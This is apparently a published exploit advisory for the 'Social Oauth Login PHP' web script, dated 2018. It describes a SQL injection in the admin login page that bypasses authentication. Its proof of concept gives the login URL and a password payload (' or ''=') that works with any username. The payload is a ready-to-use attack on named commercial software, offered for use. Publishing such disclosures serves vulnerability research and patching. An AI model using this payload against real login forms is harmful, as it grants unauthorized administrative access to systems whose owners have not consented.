Social Oauth Login PHP SQL Injection

Social Oauth Login PHP suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | 50c6d42d491cdd52647e23330f7ba0bf

# Exploit Title: Social Oauth Login PHP - Authentication Bypass
# Dork: N/A
# Date: 2018-02-12
# Exploit Author: Borna nematzadeh (L0RD) or [email protected]
# Vendor Homepage: https://www.codester.com/items/4554/social-oauth-login-php
# Version: All version
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can bypass admin login authentication.
# # # # #
# Proof of Concept :

http://localhost/PATH/adminLogin.php

# Username : anything
# Password : ' or ''='


Related Posts